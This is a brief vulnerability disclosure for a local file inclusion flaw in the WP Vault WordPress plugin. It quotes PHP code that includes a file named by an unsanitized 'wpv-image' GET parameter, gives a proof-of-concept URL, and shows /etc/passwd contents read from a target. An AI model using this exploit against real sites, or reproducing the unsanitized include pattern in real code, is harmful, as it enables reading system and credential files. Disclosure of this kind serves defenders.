WordPress Plugin WP Vault Local File Inclusion

### Description: Type user access: any user. $_GET[“wpv-image”] is not escaped in include file. ### File / Code: Path: /wp-content/plugins/wp-vault/trunk/wp-vault.php ``` include(dirname(__FILE__) . "/images/" . $_GET["wpv-image"]); if (isset($_GET["wpv_file_id"])) { include(dirname(__FILE__) . "/wpv-file-handler.php"); exit; } else if (isset($_POST["wpv-tooltip"])) { include(dirname(__FILE__) . "/ajax-response/wpv-tooltip.php"); exit; } else if (isset($_GET["wpv-image"])) { include(dirname(__FILE__) . "/images/" . $_GET["wpv-image"]); exit; } else if (isset($_GET["wpv-css"])) { if (file_exists(dirname(__FILE__) . "/css/" . $_GET["wpv-css"] . ".css")) { header("Content-type: text/css"); include(dirname(__FILE__) . "/css/" . $_GET["wpv-css"] . ".css"); exit; } else if (file_exists(dirname(__FILE__) . "/css/" . $_GET["wpv-css"] . ".css.php")) { header("Content-type: text/css"); include(dirname(__FILE__) . "/css/" . $_GET["wpv-css"] . ".css.php"); exit; } } ``` ### Proof of Concept: http://Target/?wpv-image=[LFI] ### Result: Print file, example, sensible files: root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin